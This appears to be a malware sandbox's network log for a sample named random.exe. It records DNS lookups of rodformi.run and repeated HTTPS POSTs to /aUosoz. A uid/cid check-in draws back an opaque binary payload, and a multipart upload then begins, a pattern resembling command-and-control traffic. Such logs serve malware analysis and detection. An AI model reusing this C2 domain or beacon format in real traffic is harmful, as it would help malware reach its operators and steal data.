Apr 2, 2025 11:33:22.212542057 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:22.213774920 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:22.213788986 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:22.423160076 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:22.423321009 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:22.527708054 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:22.527746916 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:22.528104067 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:22.578366995 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:22.655366898 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:22.655412912 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:22.655563116 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.146486044 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.146545887 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.146574974 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.146594048 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.146627903 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.146666050 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.146676064 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.146713972 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.146744013 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.146755934 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.146764994 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.146797895 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.146806002 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.147221088 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.147255898 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.147263050 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.187752008 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.270107031 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.270277023 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.270349979 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.270361900 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.270390987 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.270534992 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.270534992 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.270564079 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.270632982 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.270704031 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.270821095 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.270859003 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.270874023 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.270989895 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.271028042 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.271037102 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.271790028 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.271830082 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.271837950 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.271924973 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.271960020 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.271960020 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.271971941 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.272006035 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.272013903 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.272629023 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.272672892 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.274116039 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.274132013 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.274146080 CEST | 49681 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.274152994 CEST | 443 | 49681 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.898535967 CEST | 49682 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.898577929 CEST | 443 | 49682 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:23.898654938 CEST | 49682 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.898984909 CEST | 49682 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:23.898993969 CEST | 443 | 49682 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:24.103634119 CEST | 443 | 49682 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:24.103861094 CEST | 49682 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:24.106494904 CEST | 49682 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:24.106515884 CEST | 443 | 49682 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:24.106736898 CEST | 443 | 49682 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:24.107976913 CEST | 49682 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:24.107976913 CEST | 49682 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:24.108016014 CEST | 443 | 49682 | 172.67.197.67 | 192.168.2.10
Apr 2, 2025 11:33:24.108166933 CEST | 49682 | 443 | 192.168.2.10 | 172.67.197.67
Apr 2, 2025 11:33:24.148288012 CEST | 443 | 49682 | 172.67.197.67 | 192.168.2.10
                                                                                              Apr 2, 2025 11:33:24.847443104 CEST44349682172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:24.847558975 CEST44349682172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:24.848372936 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:24.848372936 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.156538010 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.156578064 CEST44349682172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.396210909 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.396269083 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.396341085 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.400588989 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.400607109 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.610781908 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.611141920 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.612270117 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.612292051 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.612504959 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.613588095 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.613588095 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.613641977 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.613770962 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.613780022 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.360728025 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.360843897 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.360910892 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.361771107 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.361787081 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.540852070 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.540901899 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.541095018 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.541387081 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.541404009 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.746664047 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.746905088 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.748194933 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.748202085 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.749062061 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.750340939 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.750426054 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.750683069 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.750739098 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.750747919 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:27.390494108 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:27.390602112 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:27.392498016 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:27.392498016 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:27.703413010 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:27.703452110 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:28.442174911 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.442229033 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:28.442301989 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.442634106 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.442650080 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:28.648976088 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:28.649049044 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.650290966 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.650302887 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:28.650806904 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:28.652138948 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.652251005 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.652318001 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.177012920 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.177135944 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.177180052 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.177248955 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.177267075 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.649494886 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.649559975 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.649631023 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.649975061 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.649985075 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.859019041 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.859097958 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.860728025 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.860758066 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.861095905 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.862426043 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.863231897 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.863285065 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.863406897 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.863456964 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.863590002 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.863639116 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.863795042 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.863864899 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.864032030 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.864094019 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.864301920 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.864357948 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.864377022 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.864403963 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.864573956 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.864619017 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.864670038 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.864748001 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.864824057 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.908281088 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.908487082 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.908536911 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.908561945 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.908586979 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.908616066 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.908629894 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.465940952 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.466142893 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.466223955 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.466223955 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.513161898 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.513220072 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.513314009 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.513633013 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.513643980 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.717726946 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.717847109 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.719414949 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.719424963 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.719711065 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.720834017 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.720854998 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.720912933 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.765893936 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.765929937 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:32.125080109 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:32.125235081 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:32.125307083 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:32.125504971 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:32.125520945 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:32.125536919 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:32.125543118 CEST44349687172.67.197.67192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 2, 2025 11:33:22.078124046 CEST | 61553 | 53 | 192.168.2.10 | 1.1.1.1
Apr 2, 2025 11:33:22.181329966 CEST | 53 | 61553 | 1.1.1.1 | 192.168.2.10
Apr 2, 2025 11:33:37.338689089 CEST | 63363 | 53 | 192.168.2.10 | 1.1.1.1
Apr 2, 2025 11:33:37.435775995 CEST | 53 | 63363 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 2, 2025 11:33:22.078124046 CEST | 192.168.2.10 | 1.1.1.1 | 0x3b8a | Standard query (0) | rodformi.run | A (IP address) | IN (0x0001) | false
Apr 2, 2025 11:33:37.338689089 CEST | 192.168.2.10 | 1.1.1.1 | 0x7365 | Standard query (0) | c.pki.goog | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 2, 2025 11:33:22.181329966 CEST | 1.1.1.1 | 192.168.2.10 | 0x3b8a | No error (0) | rodformi.run | - | 172.67.197.67 | A (IP address) | IN (0x0001) | false
Apr 2, 2025 11:33:22.181329966 CEST | 1.1.1.1 | 192.168.2.10 | 0x3b8a | No error (0) | rodformi.run | - | 104.21.52.83 | A (IP address) | IN (0x0001) | false
Apr 2, 2025 11:33:37.103326082 CEST | 1.1.1.1 | 192.168.2.10 | 0x217e | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Apr 2, 2025 11:33:37.103326082 CEST | 1.1.1.1 | 192.168.2.10 | 0x217e | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Apr 2, 2025 11:33:37.435775995 CEST | 1.1.1.1 | 192.168.2.10 | 0x7365 | No error (0) | c.pki.goog | pki-goog.l.google.com | - | CNAME (Canonical name) | IN (0x0001) | false
Apr 2, 2025 11:33:37.435775995 CEST | 1.1.1.1 | 192.168.2.10 | 0x7365 | No error (0) | pki-goog.l.google.com | - | 142.250.80.35 | A (IP address) | IN (0x0001) | false
                                                                                              • rodformi.run
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49681 | 172.67.197.67 | 443 | 6208 | C:\Users\user\Desktop\random.exe
Timestamp | Bytes transferred | Direction | Data
2025-04-02 09:33:22 UTC | 263 | OUT | POST /aUosoz HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 65
Host: rodformi.run
2025-04-02 09:33:22 UTC | 65 | OUT | Data Raw: 75 69 64 3d 36 30 62 39 66 39 65 35 34 37 36 65 35 61 64 64 65 62 64 33 35 65 65 37 38 33 31 39 33 34 34 38 32 30 63 39 34 32 36 37 38 64 63 62 61 33 63 38 33 31 30 66 39 37 37 37 26 63 69 64 3d
Data Ascii: uid=60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777&cid=
2025-04-02 09:33:23 UTC | 244 | IN | HTTP/1.1 200 OK
                                                                                              Date: Wed, 02 Apr 2025 09:33:23 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 33710
                                                                                              Connection: close
                                                                                              Server: cloudflare
                                                                                              Cf-Cache-Status: DYNAMIC
                                                                                              CF-RAY: 929f5308ec0041a6-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              Data Ascii: pKY^dOGjk7yFmYO0,xV;}QJ.[Okl(GZbGEqlP(YI`JnMJw3^o\QY"ww'UeE#Aey^"Q+I*sKJXPi9f!>NW'|H[
                                                                                              2025-04-02 09:33:23 UTC1369INData Raw: e2 a0 00 a0 e5 15 53 3a cf a2 b6 51 a0 31 d4 87 42 34 62 a9 9e 0e e7 4f 70 78 eb d9 9a 89 7a 42 a2 15 d9 24 6d 01 62 a6 3e fc b1 2a e1 69 52 8d ec 69 49 71 2d 8d 7c 39 87 7e 85 5b 74 6a a0 dc 90 91 41 6c c9 34 77 9b 14 69 a9 a2 6d fe ef 95 e7 cd 95 3f b0 fb 63 5a a6 f9 81 74 ca cf 1f 0b aa 83 57 4b f3 50 ed 1a f5 31 91 a8 fb a3 ce 07 5c 06 6f fe 38 54 19 bc a1 19 fc 0c eb 15 aa 36 28 45 ca 30 40 f6 ec 9e e6 de 00 3e f6 41 ac 62 3c 84 d7 5f 8c 14 5c 14 58 f4 4b 10 77 73 26 98 a0 4e b1 86 9e 0d 0e 96 b8 e0 28 f4 27 05 3a a1 19 01 d9 2b ae 6d 33 0b 79 7d 86 dc 57 b3 fb b2 4e 38 d5 13 1b cb 2f 82 f0 a7 60 5d f2 43 b5 5d 10 ba a5 d0 b5 d9 f7 0a 35 13 20 47 7a d8 eb d4 f9 d4 7c b3 b0 f4 e2 60 46 55 09 b4 d3 63 29 79 f2 f6 5d 9c 55 f2 92 03 b4 72 80 3e e5 59 d8
                                                                                              Data Ascii: S:Q1B4bOpxzB$mb>*iRiIq-|9~[tjAl4wim?cZtWKP1\o8T6(E0@>Ab<_\XKws&N(':+m3y}WN8/`]C]5 Gz|`FUc)y]Ur>Y
                                                                                              2025-04-02 09:33:23 UTC1369INData Raw: c2 0d 83 c3 10 6a de 44 a3 27 c9 bf d4 35 a1 21 7b b1 18 95 d0 53 93 fc d4 47 c2 ff 08 08 ad 8d 8e 7e cb d3 74 4d 41 1c ed 79 3e db 17 8f 00 3f ac b9 45 5f 14 5f be bd ed 7b c9 b5 a7 68 6d a4 2d 59 9b f9 8f aa fa a9 06 59 ec 53 bd fd a9 08 f6 7f 18 21 c1 3d c9 0f fc ab 1e a4 79 8a fa 40 22 c5 05 fa 8d d8 f4 3e a6 c0 19 bc a5 4f 76 fe 56 78 68 2c 20 a3 2f 3b a2 9f a8 c8 c8 c1 d3 ba cc e5 3d 09 28 64 d6 40 22 e6 a3 6e 34 99 46 e6 d8 6d c1 df 22 91 0e ed 75 63 4d 6f 5c f4 04 88 2f 36 05 b6 4c b2 e1 ea 1f a3 83 fe d6 cc 05 8a 8d c5 7f 15 6c f3 02 81 1a 3e ee 32 9d c6 8f eb f8 0c 00 c1 0b 98 2d b6 78 26 da 3f fd 63 e1 18 79 15 4c 13 33 c4 21 6d 99 36 71 b4 a6 64 9a 75 79 3d ae f1 92 54 59 fe dc c6 0e bf e3 2d 12 f9 cf fe 06 19 fb 10 de e7 62 f2 b8 f1 aa 7c f3
                                                                                              Data Ascii: jD'5!{SG~tMAy>?E__{hm-YYS!=y@">OvVxh, /;=(d@"n4Fm"ucMo\/6Ll>2-x&?cyL3!m6qduy=TY-b|
                                                                                              2025-04-02 09:33:23 UTC1369INData Raw: 91 c5 e0 3e 03 db c9 49 3f 42 6e 1a c6 e6 73 95 53 c4 91 c0 d6 e8 32 2f 17 76 15 e2 44 cc 90 d4 b8 08 db 52 71 31 16 d3 3b a9 26 a7 39 93 7b 48 10 a4 7a 07 51 80 62 bf 5b ea a2 b6 a9 56 b6 f9 65 32 97 5a 22 97 bf b6 a0 b0 65 61 b4 cc 4d b3 34 e1 e3 f7 11 96 21 05 79 62 a1 f7 ab 24 ee ec 5b 89 f8 28 d8 18 c2 fa 41 37 c7 90 b0 77 04 96 a9 bb 72 df 5a 89 b2 1f f2 c0 c1 40 81 f7 8b e4 74 07 c7 68 f9 dd 91 d1 2c 01 71 9b 9b 4b 30 1a 83 37 6c 81 bc 19 af eb f9 6d d2 7e 9f f3 21 d7 0f 94 25 95 b0 90 27 98 40 80 e5 64 eb d5 11 9e bb e8 69 de ec fd 30 e7 7a f0 43 5f b6 a9 53 56 9c 68 54 50 25 59 35 a0 5b 82 d1 9b cf 73 7b 64 be 4b f0 21 68 cd d5 80 54 81 1f ed 6e e8 88 87 a1 69 6c 14 0f 9e 39 2b ed 89 d2 d1 14 e5 09 d3 72 d2 e4 58 24 d3 f4 2c c2 43 b9 aa f0 8c e2
                                                                                              Data Ascii: >I?BnsS2/vDRq1;&9{HzQb[Ve2Z"eaM4!yb$[(A7wrZ@th,qK07lm~!%'@di0zC_SVhTP%Y5[s{dK!hTnil9+rX$,C
                                                                                              2025-04-02 09:33:23 UTC211INData Raw: 88 c4 55 10 15 5c 0d 9d 4e ab c8 50 6f ea f7 0e 04 ad 98 16 16 a3 cd 2f 0e 40 a9 4a 04 db c3 88 34 b7 c2 3c 06 0a 86 4f 6c 2d 92 7f a0 c9 b3 9a 5d b1 36 9a a4 c3 f1 80 d4 4a 9a d1 2d bb 60 42 43 1e d7 79 00 8b 5c a9 6b 8c 3b 77 2c 75 49 7c d8 e3 81 00 ed dc dd 00 35 73 6f 72 84 05 1e c7 0f 46 98 1a 4f 82 6a 21 d4 3b 19 00 be 98 4b 62 7a 63 4d 0d 1a b7 41 13 88 02 cc 42 f1 c1 a7 6f 97 3f 1d 5f aa ae b4 37 5b b8 e1 7b e1 59 85 95 1c ee 1b 51 d7 56 92 9a b2 1d d9 56 92 db 0a 2f 57 eb cf d5 70 f8 f8 6e fe f3 42 3b 25 8f 90 3b 90 27 79 fe 0f f3 20 74 6b 48 9e 79 72 0e dd b1 27 c6 c9 e7 6c 90 e1 56 70 b9 a3 ea 77 28 58 93 73 56 54
                                                                                              Data Ascii: U\NPo/@J4<Ol-]6J-`BCy\k;w,uI|5sorFOj!;KbzcMABo?_7[{YQVV/WpnB;%;'y tkHyr'lVpw(XsVT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49682 | 172.67.197.67 | 443 | 6208 | C:\Users\user\Desktop\random.exe

Timestamp | Bytes transferred | Direction | Data
2025-04-02 09:33:24 UTC | 271 | OUT | POST /aUosoz HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=MYI1hYv5
